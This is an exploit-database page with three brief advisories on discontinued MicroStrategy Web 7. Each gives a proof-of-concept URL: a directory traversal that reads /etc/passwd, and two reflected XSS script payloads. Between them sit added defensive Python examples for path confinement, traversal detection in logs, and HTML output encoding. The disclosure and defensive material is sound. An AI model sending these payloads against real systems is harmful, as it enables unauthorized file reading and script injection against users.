Microstrategy Web 7 – Cross-Site Scripting / Directory Traversal

  • Author: Rafael Pedrero
    Date: 2018-10-30
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/45755/
  • <!--
    # Exploit Title: Path traversal vulnerability in Microstrategy Web version 7
    # Date: 29-10-2018
    # Exploit Author: Rafael Pedrero
    # Vendor Homepage: https://www.microstrategy.com
    # Software Link: https://www.microstrategy.com
    # Version: Microstrategy Web version 7
    # Tested on: all
    # CVE : CVE-2018-18777
    # Category: webapps
    
    1. Description
    
    Directory traversal vulnerability in Microstrategy Web, version 7, in
    "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) allows remote
    authenticated users to bypass intended SecurityManager restrictions and
    list a parent directory via a /.. (slash dot dot) in a pathname used by a
    web application.
    
    
    2. Proof of Concept
    
    http://X.X.X.X/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=../../../../../../../../etc/passwd
    
    3. Solution:
    
    The product is discontinued. Update to the latest version of this product.
    Patch:
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
    
    -->
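The traversal described above comes down to one missing check: the `subpage` value is joined onto a directory without verifying that the canonical result still lies inside that directory. The following Python is an added example, not MicroStrategy's servlet code. It shows the check as a defender would implement it (canonicalise both paths, then compare prefixes, rather than grepping for `..`), and a small scan over constructed access-log lines that flags requests carrying a dot-dot segment in any query parameter, including the PoC request. `SUBPAGE_ROOT` is an assumed, hypothetical document root.

```python
# Added example for this advisory (not MicroStrategy code): confine a
# user-supplied "subpage" value to a base directory, and scan access-log
# lines for dot-dot segments in query parameters such as the PoC above.
import os
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Hypothetical document root for the servlet's sub-pages (assumption)
SUBPAGE_ROOT = "/var/www/WebMstr7/subpages"


def resolve_subpage(base_dir: str, subpage: str) -> Optional[str]:
    """Return the canonical path for `subpage` if it stays inside `base_dir`, else None.

    The servlet framework has already URL-decoded the parameter, so the check
    runs on the decoded value: reject empty/NUL, absolute paths and
    backslashes, then compare canonical prefixes instead of string-matching
    for "..", which misses normalisation cases.
    """
    if not subpage or "\x00" in subpage:
        return None
    if subpage.startswith(("/", "\\")) or "\\" in subpage:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, subpage))
    # Accept only base_dir itself or a descendant of it
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# A dot-dot path segment, with either separator, anywhere in a value
DOTDOT_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
# Request line inside a combined-format access-log entry
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def request_has_traversal(log_line: str) -> bool:
    """True if any query-string parameter of the logged request holds a dot-dot segment."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    query = urlsplit(m.group(1)).query
    # parse_qs percent-decodes values, so %2e%2e/ is inspected as ../
    for values in parse_qs(query, keep_blank_values=True).values():
        if any(DOTDOT_RE.search(v) for v in values):
            return True
    return False


def flagged_clients(log_lines: List[str]) -> List[str]:
    """Client IPs (first field of each combined-log line) whose request was flagged."""
    return [line.split(" ", 1)[0] for line in log_lines if request_has_traversal(line)]


# Constructed sample log lines: a legitimate sub-page request, the PoC
# request from the advisory, and a percent-encoded form of the same value.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Oct/2018:10:00:01 +0000] "GET /WebMstr7/servlet/mstrWeb'
    '?evt=3045&src=mstrWeb.3045&subpage=reports/main.html HTTP/1.1" 200 512',
    '10.0.0.9 - - [29/Oct/2018:10:00:02 +0000] "GET /WebMstr7/servlet/mstrWeb'
    '?evt=3045&src=mstrWeb.3045&subpage=../../../../../../../../etc/passwd HTTP/1.1" 200 1024',
    '10.0.0.9 - - [29/Oct/2018:10:00:03 +0000] "GET /WebMstr7/servlet/mstrWeb'
    '?evt=3045&src=mstrWeb.3045&subpage=%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    print(resolve_subpage(SUBPAGE_ROOT, "reports/main.html"))
    print(resolve_subpage(SUBPAGE_ROOT, "../../../../../../../../etc/passwd"))
    print(flagged_clients(SAMPLE_LOG))
```

The resolver deliberately compares `os.path.realpath` results for both sides, so symlinked roots and `a/../b` style values are handled consistently; a plain substring test for `..` would reject harmless values like `a/../b.html` while still being fragile. The log scan decodes the query string the same way the application does before matching, which is why the encoded third line is flagged as well as the literal PoC.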
    
    <!--
    # Exploit Title: Cross Site Scripting in Microstrategy Web version 7
    # Date: 29-10-2018
    # Exploit Author: Rafael Pedrero
    # Vendor Homepage: https://www.microstrategy.com
    # Software Link: https://www.microstrategy.com
    # Version: Microstrategy Web version 7
    # Tested on: Unix
    # CVE : CVE-2018-18775
    # Category: webapps
    
    1. Description
    
    Microstrategy Web, version 7, does not sufficiently encode user-controlled
    inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the
    Login.asp Msg parameter.
    
    
    2. Proof of Concept
    
    http://X.X.X.X/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg="><script>alert("XSS");</script><"
    
    3. Solution:
    
    The product is discontinued. Update to the latest version of this product.
    Patch:
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
    
    -->
    
    <!--
    # Exploit Title: Cross Site Scripting in Microstrategy Web version 7
    # Date: 29-10-2018
    # Exploit Author: Rafael Pedrero
    # Vendor Homepage: https://www.microstrategy.com
    # Software Link: https://www.microstrategy.com
    # Version: Microstrategy Web version 7
    # Tested on: all
    # CVE : CVE-2018-18776
    # Category: webapps
    
    1. Description
    
    Microstrategy Web, version 7, does not sufficiently encode user-controlled
    inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the
    admin.asp ShowAll parameter.
    
    
    2. Proof of Concept
    
    http://X.X.X.X/microstrategy7/admin/admin.asp?ShowAll="><script>alert("XSS")</script><"&ShowAllServers=show
    
    3. Solution:
    
    The product is discontinued. Update to the latest version of this product.
    Patch:
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
    
    -->
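Both XSS entries (the `Msg` parameter of Login.asp and the `ShowAll` parameter of admin.asp) share one root cause: a request parameter is written back into the page without output encoding, and the PoC value closes the surrounding quoted attribute. The following Python is an added example rather than MicroStrategy's ASP code; it renders a stand-in form fragment with raw interpolation beside the version that applies the OWASP output-encoding rules the "Patch" link refers to, and uses the standard-library HTML parser to confirm that the encoded version keeps the value inside the attribute. The template markup is assumed, not taken from the product.

```python
# Added example for the two XSS advisories (Login.asp Msg, admin.asp ShowAll);
# not MicroStrategy code. Shows raw interpolation of a request parameter into
# HTML beside the output-encoded form, and checks the result with a parser.
import html
from html.parser import HTMLParser
from typing import Dict, List, Tuple

# The PoC value from the advisory, as the server sees it after URL decoding
POC_MSG = '"><script>alert("XSS");</script><"'


def render_msg_vulnerable(msg: str) -> str:
    """Before: the parameter lands in a quoted attribute and in element text unencoded."""
    return (f'<input type="hidden" name="Msg" value="{msg}">'
            f'<p class="msg">{msg}</p>')


def encode_for_html(value: str) -> str:
    """OWASP rules #1/#2: entity-encode & < > " ' so the value is safe in
    element text and inside a quoted attribute without altering the markup."""
    return html.escape(value, quote=True)


def render_msg(msg: str) -> str:
    """After: the same assumed template, every interpolation passes through encode_for_html."""
    safe = encode_for_html(msg)
    return (f'<input type="hidden" name="Msg" value="{safe}">'
            f'<p class="msg">{safe}</p>')


class _Collector(HTMLParser):
    """Records start tags in order and the attributes of the hidden Msg input."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []
        self.msg_attrs: Dict[str, str] = {}

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)
        if tag == "input" and dict(attrs).get("name") == "Msg":
            self.msg_attrs = dict(attrs)


def inspect(fragment: str) -> Tuple[List[str], str]:
    """Return (all start tags in document order, decoded value of the Msg input)."""
    p = _Collector()
    p.feed(fragment)
    p.close()
    return p.tags, p.msg_attrs.get("value", "")


if __name__ == "__main__":
    # Vulnerable: a <script> element becomes part of the page
    print(inspect(render_msg_vulnerable(POC_MSG)))
    # Encoded: only the input and p elements exist, and the value round-trips intact
    print(inspect(render_msg(POC_MSG)))
```

The point the parser check makes is that encoding is not the same as stripping: the hardened output still carries the complete original string (the browser decodes `&quot;` and `&lt;` back for display and for the form value), it just can no longer change which element or attribute the text belongs to. Encoding must be applied at the point of output for the context in use; the same value placed into a JavaScript block or a URL would need that context's encoder instead of the HTML one.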